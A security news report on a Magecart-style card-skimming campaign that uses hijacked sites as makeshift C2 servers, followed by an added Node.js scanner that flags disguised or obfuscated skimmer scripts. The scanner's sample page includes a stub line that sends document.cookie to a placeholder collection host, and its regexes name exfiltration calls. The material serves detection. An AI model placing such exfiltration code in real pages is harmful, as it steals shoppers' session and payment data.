Cybersecurity researchers have discovered an ongoing campaign using a new Magecart-style web skimmer designed to steal personally identifiable information (PII) and credit card data from e-commerce websites.
What sets it apart from other Magecart campaigns is that a hijacked site is then repurposed as a "makeshift" command-and-control (C2) server, quietly serving the malicious code to other sites without the compromised site's knowledge.
Web security firm Akamai says it has identified victims of varying sizes in North America, Latin America and Europe, potentially putting the personal data of thousands of site visitors at risk of being harvested and sold for illegal profit.
“The attacker used a number of evasion techniques during the campaign, including obfuscating using Base64 and disguising the attack to resemble popular third-party services, such as Google Analytics or Google Tag Manager,” Akamai security researcher Roman Lvovsky said.
In short, the idea is to compromise a vulnerable but legitimate site and use it to host the web skimmer code, thereby trading on the genuine domain's good reputation. In some cases, the attacks have been going on for almost a month.
“Instead of using the attacker’s own C2 servers to host malicious code, which may be flagged as a malicious domain, attackers hack (using vulnerabilities or any other means at their disposal) legitimate and vulnerable sites, such as small or medium-sized retail sites, and store their code in them,” said Akamai.
The result is two types of victims: legitimate sites that have been compromised to act as malware “distribution centers,” and vulnerable e-commerce websites that are targeted by the skimmer itself.
In some cases, websites are not only targets for data theft, but unknowingly serve as a vehicle for spreading malware to other vulnerable websites.
“These attacks included exploits for Magento, WooCommerce, WordPress, and Shopify, demonstrating the growing diversity of vulnerabilities and abused digital commerce platforms,” said Lvovsky.
By leveraging the trust that established websites have accumulated over time, this technique creates a “smoke screen” that makes such attacks difficult to identify and respond to.
The campaign also uses other methods to avoid detection, including disguising the skimmer code as a third-party service such as Google Tag Manager or Facebook Pixel to hide its true intent.
The obfuscated skimmer code, which comes in two different variants, is equipped to intercept PII and credit card details and exfiltrate them as encoded strings via HTTP requests to actor-controlled servers.
“Exfiltration will only occur once for each user making a payment,” said Lvovsky. “Once a user’s information is stolen, the script will flag the browser to ensure it doesn’t steal the information twice (to reduce suspicious network traffic). This further increases the reluctance of this Magecart-style attack.”
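As an added illustration of the two evasion patterns described above (scripts named to resemble Google Tag Manager, Google Analytics or Facebook Pixel but served from elsewhere, and Base64-obfuscated inline payloads that decode and then send data off-site), the following Node.js script scans a page's script tags and flags both. It is example code written for this page, not Akamai's detection logic or code recovered from the campaign; the allowlisted hostnames, the 80-character blob threshold, the assumed shop origin and the sample HTML are all constructed for the demo.

```javascript
// Added example (not from the article or Akamai): heuristic triage of a
// page's <script> tags for two Magecart-style evasion patterns:
//   1. an external script whose name mimics a tag service (GTM, GA, Pixel)
//      but is served from a host outside the service's real domains;
//   2. an inline script that embeds a long Base64 blob, decodes it with
//      atob(), and contains a call capable of sending data off-site.
// The allowlist, the 80-character blob threshold, the assumed shop origin
// and the sample page below are assumptions made for this demo.

// Hostnames the genuine services load from (assumed allowlist).
const LEGIT_TAG_HOSTS = [
  "googletagmanager.com",
  "google-analytics.com",
  "connect.facebook.net",
];

// Name fragments an attacker reuses so a rogue script looks familiar.
const LOOKALIKE_TERMS = /gtm|tagmanager|analytics|gtag|fbevents|pixel/i;

// Returns { src, body } for every <script> element in the HTML string.
function extractScripts(html) {
  const scripts = [];
  const tagRe = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const src = /\bsrc\s*=\s*["']([^"']+)["']/i.exec(m[1]);
    scripts.push({ src: src ? src[1] : null, body: m[2].trim() });
  }
  return scripts;
}

// Resolves relative URLs against the (assumed) shop origin.
function hostOf(url) {
  try {
    return new URL(url, "https://shop.example/").hostname;
  } catch {
    return null;
  }
}

function hostAllowed(host) {
  return LEGIT_TAG_HOSTS.some((h) => host === h || host.endsWith("." + h));
}

// Returns one finding per suspicious script, in document order.
function findSuspiciousScripts(html) {
  const findings = [];
  for (const s of extractScripts(html)) {
    if (s.src !== null) {
      const host = hostOf(s.src);
      if (host && LOOKALIKE_TERMS.test(s.src) && !hostAllowed(host)) {
        findings.push({ kind: "lookalike-external", src: s.src, host });
      }
      continue;
    }
    const hasBlob = /["'][A-Za-z0-9+/]{80,}={0,2}["']/.test(s.body);
    const decodes = /\batob\s*\(/.test(s.body);
    const canExfil = /\b(?:fetch|XMLHttpRequest|sendBeacon|new\s+Image)\b/.test(s.body);
    if (hasBlob && decodes && canExfil) {
      findings.push({ kind: "obfuscated-inline", bytes: s.body.length });
    }
  }
  return findings;
}

// Constructed sample page: one genuine GTM loader, one lookalike served from
// the retailer's own (compromised) CDN, one obfuscated inline skimmer, and one
// harmless inline script.
const SAMPLE_PAGE = `
<html><head>
<script src="https://www.googletagmanager.com/gtm.js?id=GTM-TEST"></script>
<script src="https://cdn.retailer-victim.example/js/gtm-analytics.js"></script>
<script>
var p = "${'A'.repeat(120)}";
var c = atob(p);
fetch("https://collect.example/x?d=" + btoa(document.cookie));
</script>
<script>console.log("harmless inline script");</script>
</head></html>`;

console.log(JSON.stringify(findSuspiciousScripts(SAMPLE_PAGE), null, 2));
```

Run against the sample page, the scanner reports the lookalike loader on the retailer's CDN and the inline blob-plus-atob-plus-fetch script, and leaves the genuine Google Tag Manager loader and the harmless inline script alone. The rules are deliberately crude triage heuristics: a shop that legitimately serves its own file named analytics.js from its own domain will trip the first rule, so the allowlist should be tuned per site, and a skimmer that stages its payload through a different decoder than atob() will slip past the second.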